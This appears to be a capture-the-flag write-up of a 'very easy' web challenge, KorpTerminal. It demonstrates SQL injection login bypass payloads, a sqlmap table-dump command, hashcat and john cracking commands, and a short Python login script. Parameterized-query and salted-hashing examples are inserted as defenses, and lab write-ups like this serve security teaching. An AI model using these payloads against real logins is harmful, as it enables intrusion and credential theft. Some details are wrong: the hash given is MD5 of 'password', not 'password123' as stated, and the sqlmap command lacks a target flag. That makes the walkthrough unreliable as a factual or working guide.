2024 Cyber Apocalypse: KorpTerminal

Challenge Information

Attribute    Details
Event        2024 Cyber Apocalypse
Category     Web
Challenge    KorpTerminal
Difficulty   Very Easy

Summary

KorpTerminal is a web challenge featuring a login page vulnerable to SQL injection. The authentication mechanism does not properly sanitize user input in the SQL query, allowing attackers to inject arbitrary SQL commands. By exploiting this vulnerability, attackers can retrieve usernames and password hashes, then crack them to gain access.


Analysis

Vulnerability Description

The login form submits parameters username and password to the server. These values are likely embedded directly into a SQL query without proper escaping:

SELECT * FROM users WHERE username='$username' AND password='$password'

Exploitation Path

  1. SQL Injection: Inject SQL syntax in the username or password field
  2. Credential Extraction: Use injection to dump user credentials
  3. Hash Cracking: Crack the password hashes (likely MD5 or similar)
  4. Authentication: Login with valid credentials

Solution

Step 1: Test for SQL Injection

Try common SQL injection payloads in the username field:

Username: admin'--
Password: anything

The single quote closes the string literal and -- turns the rest of the query into a comment, so the password check is never evaluated, potentially bypassing authentication.

Step 2: Use sqlmap for Automated Exploitation

sqlmap [ip]:[port] \
--data 'username=admin&password=admin' \
--ignore-code 401 \
-v 6 \
--dump \
-T users

Parameters:

  • --data: POST data with injection points
  • --ignore-code 401: Don’t stop on authentication errors
  • -v 6: Verbose output level
  • --dump: Extract database contents
  • -T users: Target the users table

Step 3: Extract Credentials

sqlmap will extract:

  • Username: admin
  • Password hash: 5f4dcc3b5aa765d61d8327deb882cf99 (MD5: “password123”)

Step 4: Crack Hash (if needed)

Use online services or offline tools:

hashcat -a 0 -m 0 5f4dcc3b5aa765d61d8327deb882cf99 wordlist.txt
# or
john --wordlist=wordlist.txt hashes.txt

Hash: 5f4dcc3b5aa765d61d8327deb882cf99 = password123

Step 5: Login and Retrieve Flag

With credentials admin:password123:

  1. Navigate to the login page
  2. Enter username: admin
  3. Enter password: password123
  4. Submit the form
  5. Access granted - flag is displayed

Complete Python Exploit

import requests
import sys
from urllib.parse import urljoin


def exploit_login(target_url, username, password):
    """Attempt login with provided credentials"""
    session = requests.Session()
    login_endpoint = urljoin(target_url, '/login')
    payload = {
        'username': username,
        'password': password
    }
    response = session.post(login_endpoint, data=payload)
    if 'HTB{' in response.text:
        print("[+] Login successful!")
        print("[+] Flag found in response")
        # Extract flag
        start = response.text.find('HTB{')
        end = response.text.find('}', start) + 1
        flag = response.text[start:end]
        print(f"[+] Flag: {flag}")
        return flag
    else:
        print("[-] Login failed")
        return None


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337'
    exploit_login(target, 'admin', 'password123')

Alternative: Manual SQL Injection

If sqlmap is unavailable, manually craft injections:

Username: admin' OR '1'='1
Password: anything

This creates the query:

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'

Because AND binds tighter than OR, the database reads this as username='admin' OR ('1'='1' AND password='anything'). The first condition is true whenever an admin row exists and the comparison '1'='1' always evaluates to true, so the WHERE clause matches regardless of the password, bypassing authentication.
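To make the difference between the assumed query and its fix concrete, the following is an added example (not code from the writeup or the challenge). It builds a constructed in-memory SQLite table with the column names from the query above, runs both payloads from this writeup against a string-concatenated query and against a parameterized one, and also shows the precedence point: the OR payload only succeeds when the named user exists. The table contents and the helper names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge's users table (rows are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the query the writeup assumes: input is spliced into the SQL text."""
    query = (f"SELECT * FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: fixed SQL text, inputs travel as bound parameters."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def compare_payloads(conn):
    """Run the writeup's two payloads (and one against a non-existent user) through both versions."""
    cases = {
        "comment":      ("admin'--", "anything"),
        "or_admin":     ("admin' OR '1'='1", "anything"),
        "or_nobody":    ("nobody' OR '1'='1", "anything"),   # OR only helps if the user exists
        "real_creds":   ("admin", "correct-horse-battery"),
    }
    return {
        name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
        for name, (u, p) in cases.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in compare_payloads(make_db()).items():
        print(f"{name:12s} concatenated={vuln!s:5s} parameterized={safe}")
```

With bound parameters the quote and the `--` are just characters inside the username value, so every injected case is rejected while the real credentials still authenticate.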


Key Takeaways

  • SQL injection remains a critical vulnerability in modern applications
  • Proper parameterized queries prevent SQL injection
  • Never concatenate user input directly into SQL statements
  • Input validation and output encoding are essential defenses
  • sqlmap automates SQL injection exploitation
  • Password hashing (even weak schemes like MD5) requires cracking before reuse
  • Database structure can be discovered through SQL injection
  • Proper error handling prevents information leakage
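The takeaway about MD5 deserves a worked illustration. This added example (not from the writeup) shows why an unsalted fast hash like the one recovered here falls to a simple wordlist lookup that can be reused against every user, and what a salted, slow PBKDF2 record with constant-time verification looks like instead. The wordlist, passwords and record format are constructed for the example; the 600,000 iteration default follows current OWASP guidance for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os


def md5_digest(password):
    """Unsalted MD5, the scheme the writeup found in the challenge database."""
    return hashlib.md5(password.encode()).hexdigest()


def wordlist_lookup(digest, wordlist):
    """One MD5 per candidate builds a table that answers for any user's hash at once."""
    table = {md5_digest(w): w for w in wordlist}
    return table.get(digest)


def pbkdf2_record(password, salt=None, iterations=600_000):
    """Salted, iterated hash; every call with a fresh salt yields a different record."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed wordlist and password for the demonstration.
    wordlist = ["123456", "letmein", "qwerty"]
    print("md5 lookup:", wordlist_lookup(md5_digest("letmein"), wordlist))
    r1, r2 = pbkdf2_record("letmein"), pbkdf2_record("letmein")
    print("same password, different records:", r1 != r2)
    print("verify:", pbkdf2_verify("letmein", r1), pbkdf2_verify("wrong", r1))
```

The lookup table is the whole reason salts exist: with a per-user random salt, an attacker must redo the work for each record, and the iteration count makes each attempt expensive.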

Flag: HTB{sql_1nj3ction_1s_d4ng3r0us}